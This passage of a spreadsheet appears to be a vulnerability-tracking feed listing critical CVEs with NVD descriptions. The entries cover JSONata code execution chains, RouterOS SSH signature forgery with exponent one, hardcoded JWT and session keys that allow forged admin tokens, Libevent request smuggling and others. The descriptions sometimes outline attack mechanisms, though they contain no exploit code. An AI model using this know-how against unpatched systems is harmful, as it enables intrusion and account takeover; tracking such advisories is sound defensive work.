      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73251</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.23, a network attacker can impersonate a TLS server to a Mongoose client configured with a multi-certificate CA bundle. In src/tls_builtin.c, the mg_tls_init() function stores the bundle in tls-&gt;ca_bundle_der while tls-&gt;ca_der.len remains zero, and mg_tls_recv_cert() uses tls_bundle_find() to accept a Common Name match without calling mg_tls_verify_cert_signature(). A forged self-signed certificate can therefore satisfy hostname and CertificateVerify checks and enable interception, credential disclosure, traffic modification, and malicious responses. This issue is fixed in version 7.23.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73251</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77413</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77413</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77414</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, the src/jsonata.js environment.lookup function used a bypassable hasOwnProperty check. Crafted expressions could use $hasOwnProperty, $spread, $string, prototype access, and $constructor to reach the object prototype and invoke process.getBuiltinModule with child_process, executing arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77414</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77415</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, crafted JSONata expressions could chain several object-integrity weaknesses to execute arbitrary code. The chain could overwrite $clone to mutate objects through evaluateTransformExpression, expose and deconstruct JSONata functions or lambdas through $merge.*, replace proc.arguments.forEach used by applyProcedure, and forge internal lambda state. These primitives allowed an attacker to reach prototype getters, prototype and constructor access, and process.getBuiltinModule with child_process, executing code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77415</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77644</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-620</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>A critical bypass access control vulnerability has been reported in PTC Windchill Risk and Reliability (WRR) Enterprise Edition.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77644</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87929</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 ships with a hardcoded session encryption key in application/config/config.php that is never changed during installation, allowing unauthenticated attackers to forge administrator session cookies. Attackers can mint a malicious ci_session cookie with administrator privileges by computing an HMAC-SHA1 using the publicly known encryption key, bypassing authentication checks in is_login() and mso_check_allow() functions.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87929</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88069</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>Pandora contains a path traversal vulnerability in its archive extraction worker. When processing a specially crafted archive or disk image, attacker-controlled file paths could be used without ensuring that the resulting destination remained within the intended extraction directory.
An attacker able to submit a malicious file for analysis could use path traversal sequences or crafted paths to cause extracted content to be written outside the designated extraction directory, potentially overwriting files accessible to the Pandora worker process. Successful exploitation could result in unauthorized modification of application or system files, denial of service, and potentially further compromise depending on the permissions of the Pandora process and the files that can be overwritten.
The vulnerability is addressed by resolving each extraction destination path before writing and verifying that it remains below the expected extraction directory. Extraction attempts resolving outside this directory are rejected and reported as path traversal attempts.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88069</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63382</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, the libevent evhttp parser in http.c inconsistently handles duplicate Transfer-Encoding headers, comma-separated Transfer-Encoding values, and bare line feeds in chunked framing. evhttp_find_header can select only the first header, evhttp_check_transfer_encoding_ was absent so the previous whole-string comparison fails to recognize valid lists ending in chunked, and evhttp_handle_chunked_read uses EVBUFFER_EOL_CRLF rather than EVBUFFER_EOL_CRLF_STRICT, accepting bare LF chunk terminators. When libevent is deployed behind a proxy that frames the same request differently, an unauthenticated remote attacker can desynchronize request boundaries and smuggle a second request, potentially bypassing access controls or poisoning caches. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63382</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63385</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has two HTTP parsing weaknesses in http.c. evhttp_decode_uri_internal decodes percent-encoded %00 bytes into literal NUL characters, which can cause downstream C string operations to truncate a path and bypass validation performed on a different representation. evhttp_header_is_valid_value also accepts obsolete line folding in header values containing carriage return or line feed characters, allowing a proxy and libevent to interpret headers differently and enabling header injection or access control bypass. The CRLF header acceptance is fixed in versions 2.1.13 and 2.2.2-alpha, but the reviewed patches do not clearly remediate the URI NUL-truncation condition.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63385</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67276</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>RouterOS does not compare the complete RSA public key when matching an SSH authentication request to an authorized user key, checking the key type and modulus but omitting the exponent. Because signature verification uses the client-supplied key, an attacker knowing an authorized RSA modulus can supply a key with exponent one, forge a valid signature, and open an SSH command channel as the target user without the private key.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67276</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67402</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>An insecure Apache configuration in ConfigServer Security &amp; Firewall maps /usr/bin as CGI programs through the Messenger v3 HTTPS virtual host. A remote unauthenticated attacker whose address is blocked can request a mapped executable and run arbitrary commands as the Apache user. The vulnerability affects installations where CSF Messenger v3 and its HTTPS mode are enabled. WebPros addressed the vulnerability in version 16.31.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67402</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77645</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77645</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82090</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>Pocket through 8.33.0.0 allows XSS because "Save to Pocket" injects external HTML into the DOM.  JavaScript code can alter the application state via native bridge methods.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82090</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87930</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
